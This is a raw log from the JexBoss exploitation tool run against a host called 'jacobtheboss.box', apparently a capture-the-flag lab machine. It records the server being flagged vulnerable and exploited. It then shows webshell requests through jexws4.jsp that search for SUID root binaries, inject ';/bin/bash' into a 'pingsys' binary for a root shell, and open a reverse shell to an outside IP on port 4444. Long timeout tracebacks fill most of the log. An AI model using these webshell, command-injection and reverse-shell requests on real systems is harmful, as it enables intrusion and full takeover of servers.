2020-10-15 14:33:56,172 (CRITICAL): Module ipaddress not installed. See details:
Traceback (most recent call last):
  File "/opt/jexboss/jexboss.py", line 98, in <module>
    import ipaddress
ImportError: No module named ipaddress
2020-10-15 14:34:03,487 (INFO): Checking Host: http://jacobtheboss.box:8080/
2020-10-15 14:34:03,629 (INFO): Server http://jacobtheboss.box:8080/: VULNERABLE
2020-10-15 14:34:03,711 (INFO): Server http://jacobtheboss.box:8080/: VULNERABLE
2020-10-15 14:34:03,763 (INFO): Server http://jacobtheboss.box:8080/: VULNERABLE
2020-10-15 14:34:29,137 (INFO): Server http://jacobtheboss.box:8080/ exploited!
2020-10-15 14:38:10,470 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=find+%2F+-type+f+-user+root+-perm+-u%3Ds+2%3E%2Fdev%2Fnull
2020-10-15 14:39:33,178 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.10.62.239%3B%2Fbin%2Fbash%22
2020-10-15 14:39:39,216 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.10.62.239%3B%2Fbin%2Fbash%22
2020-10-15 14:39:45,273 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.10.62.239%3B%2Fbin%2Fbash%22
2020-10-15 14:39:51,312 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 421, in _make_request
    six.raise_from(e, None)
  File "<string>", line 3, in raise_from
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 416, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.8/http/client.py", line 1322, in getresponse
    response.begin()
  File "/usr/lib/python3.8/http/client.py", line 303, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.8/http/client.py", line 264, in _read_status
    line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
  File "/usr/lib/python3.8/socket.py", line 669, in readinto
    return self._sock.recv_into(b)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
    httplib_response = self._make_request(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 423, in _make_request
    self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 330, in _raise_timeout
    raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/jexboss/jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 75, in request
    return self.request_encode_url(
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 97, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python3/dist-packages/urllib3/poolmanager.py", line 330, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
    retries = retries.increment(
  File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.10.62.239%3B%2Fbin%2Fbash%22 (Caused by ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)"))
2020-10-15 14:41:40,926 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.106.222%3B%2Fbin%2Fbash%22
2020-10-15 14:41:46,964 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.106.222%3B%2Fbin%2Fbash%22
2020-10-15 14:41:53,010 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.106.222%3B%2Fbin%2Fbash%22
2020-10-15 14:41:59,052 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 421, in _make_request
    six.raise_from(e, None)
  File "<string>", line 3, in raise_from
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 416, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.8/http/client.py", line 1322, in getresponse
    response.begin()
  File "/usr/lib/python3.8/http/client.py", line 303, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.8/http/client.py", line 264, in _read_status
    line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
  File "/usr/lib/python3.8/socket.py", line 669, in readinto
    return self._sock.recv_into(b)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
    httplib_response = self._make_request(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 423, in _make_request
    self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 330, in _raise_timeout
    raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/jexboss/jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 75, in request
    return self.request_encode_url(
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 97, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python3/dist-packages/urllib3/poolmanager.py", line 330, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
    retries = retries.increment(
  File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.106.222%3B%2Fbin%2Fbash%22 (Caused by ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)"))
2020-10-15 14:44:33,768 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.50.72%3B%2Fbin%2Fbash%22
2020-10-15 14:44:39,814 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.50.72%3B%2Fbin%2Fbash%22
2020-10-15 14:44:45,899 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.50.72%3B%2Fbin%2Fbash%22
2020-10-15 14:44:51,940 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 421, in _make_request
    six.raise_from(e, None)
  File "<string>", line 3, in raise_from
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 416, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.8/http/client.py", line 1322, in getresponse
    response.begin()
  File "/usr/lib/python3.8/http/client.py", line 303, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.8/http/client.py", line 264, in _read_status
    line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
  File "/usr/lib/python3.8/socket.py", line 669, in readinto
    return self._sock.recv_into(b)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
    httplib_response = self._make_request(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 423, in _make_request
    self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 330, in _raise_timeout
    raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/jexboss/jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 75, in request
    return self.request_encode_url(
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 97, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python3/dist-packages/urllib3/poolmanager.py", line 330, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
    retries = retries.increment(
  File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=%2Fusr%2Fbin%2Fpingsys+%2210.8.50.72%3B%2Fbin%2Fbash%22 (Caused by ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)"))
2020-10-15 14:46:11,540 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=jexremote%3D10.8.106.22%3A4444
2020-10-15 14:46:17,582 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=jexremote%3D10.8.106.22%3A4444
2020-10-15 14:46:23,629 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)")': //jexws4/jexws4.jsp?ppp=jexremote%3D10.8.106.22%3A4444
2020-10-15 14:46:29,672 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 421, in _make_request
    six.raise_from(e, None)
  File "<string>", line 3, in raise_from
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 416, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.8/http/client.py", line 1322, in getresponse
    response.begin()
  File "/usr/lib/python3.8/http/client.py", line 303, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.8/http/client.py", line 264, in _read_status
    line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
  File "/usr/lib/python3.8/socket.py", line 669, in readinto
    return self._sock.recv_into(b)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
    httplib_response = self._make_request(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 423, in _make_request
    self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 330, in _raise_timeout
    raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/jexboss/jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 75, in request
    return self.request_encode_url(
  File "/usr/lib/python3/dist-packages/urllib3/request.py", line 97, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python3/dist-packages/urllib3/poolmanager.py", line 330, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 747, in urlopen
    return self.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
    retries = retries.increment(
  File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='jacobtheboss.box', port=8080): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=jexremote%3D10.8.106.22%3A4444 (Caused by ReadTimeoutError("HTTPConnectionPool(host='jacobtheboss.box', port=8080): Read timed out. (read timeout=6.0)"))
